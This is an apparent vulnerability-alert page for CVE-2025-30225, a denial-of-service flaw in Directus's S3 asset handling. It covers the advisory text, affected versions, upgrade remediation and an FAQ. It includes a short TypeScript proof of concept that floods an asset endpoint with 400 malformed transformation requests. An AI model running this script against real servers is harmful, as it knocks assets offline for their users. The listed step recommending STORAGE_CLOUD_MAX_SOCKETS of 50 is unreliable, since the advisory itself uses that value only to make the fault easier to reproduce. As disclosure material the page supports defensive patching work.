CVE-2025-30225: Directus's S3 assets become unavailable after a burst of malformed transformations

Published Mar 26, 2025
·
Updated

Summary When making many malformed transformation requests at once, at some point, all assets are being served as 403.

Details When I was investigating this issue, I have found that after a burst of malformed asset transformation requests, the amount of sockets held on Agent on NodeHttpHandler was always equal to STORAGECLOUDMAXSOCKETS making it impossible to have new connections causing assets to be inaccessible.

After looking into this issue on AWS SDK I found that if the stream is requested, it needs to be consumed otherwise will hang forever. And as can be seen here the stream is not consumed, because sharp will throw an error on the invalid arguments. For example ?height=xyz

The timeouts set here had no noticeable effect on tests made.

PoC This can be easily reproduced with the following steps: - setup AWS S3 storage - set STORAGECLOUDMAXSOCKETS: "50" (this value is lower than default for easier reproduction) - upload a file to your project - run this file (Replace the the file ID with the one you just uploaded): ts import axios from "axios";

async function start() { Array.from({ length: 400 }, (, i) => { axios .get( "http://localhost:8055/assets/e536aa35-3a81-4fa9-b856-3780584d38d8?width=100&height=XYZ" ) .then(() => console.log("✅")) .catch((e) => console.log("⛔", e.response?.status || e.code || e.message) ); }); }

start();

Here's an example:

https://github.com/user-attachments/assets/7f5a6f51-1c51-4d4d-aa4f-c4953e91714c

Impact This causes denial of assets for all policies of Directus, including Admin and Public.

Other sources

Directus is a real-time API and App dashboard for managing SQL database content. The @directus/storage-driver-s3 package starting in version 9.22.0 and prior to version 12.0.1, corresponding to Directus starting in version 9.22.0 and prior to 11.5.0, is vulnerable to asset unavailability after a burst of malformed transformations. When making many malformed transformation requests at once, at some point, all assets are served as 403. This causes denial of assets for all policies of Directus, including Admin and Public. Version 12.0.1 of the @directus/storage-driver-s3 package, corresponding to version 11.5.0 of Directus, fixes the issue.

MITRE

Affected Software

3 affected componentsFixes available
npm/directus>=9.22.0<11.5.0
11.5.0
npm/@directus/storage-driver-s3>=9.22.0<12.0.1
12.0.1
Monospace Directus Node.js>=9.22.0<11.5.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/directus to a version that resolves this vulnerability.

    Fixed in 11.5.0
  2. Upgrade

    Upgrade npm/@directus/storage-driver-s3 to a version that resolves this vulnerability.

    Fixed in 12.0.1
  3. Upgrade

    Upgrade @directus/storage-driver-s3 to a version that resolves this vulnerability.

    Fixed in 12.0.1
  4. Upgrade

    Upgrade Directus to a version that resolves this vulnerability.

    Fixed in 11.5.0
  5. Configuration

    Set STORAGE_CLOUD_MAX_SOCKETS to 50.

    Directus (S3 storage driver) STORAGE_CLOUD_MAX_SOCKETS = 50
  6. Compensating control

    Ensure the S3 asset transformation stream is consumed to prevent hanging connections after malformed transformation requests (the issue occurs because the stream is requested but not consumed, e.g., when sharp throws an error on invalid arguments such as ?height=xyz).

Event History

Mar 26, 2025
CVE Published
via MITRE·04:27 PM
Data Sourced
via MITRE·04:27 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:15 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:15 PM
Affected Software
Advisory Published
via GitHub·05:19 PM
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2025-30225?

CVE-2025-30225 has a moderate severity level due to the potential for service disruption when handling malformed transformation requests.

2

How do I fix CVE-2025-30225?

To fix CVE-2025-30225, upgrade to directus version 11.5.0 or @directus/storage-driver-s3 version 12.0.1.

3

Which software is affected by CVE-2025-30225?

CVE-2025-30225 affects directus versions from 9.22.0 to 11.5.0 and @directus/storage-driver-s3 versions from 9.22.0 to 12.0.1.

4

What is the impact of CVE-2025-30225 on system performance?

CVE-2025-30225 may cause a denial of service, leading to assets being served with a 403 error after a burst of malformed requests.

5

Can CVE-2025-30225 be exploited remotely?

Yes, CVE-2025-30225 can potentially be exploited remotely by overwhelming the system with malformed transformation requests.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203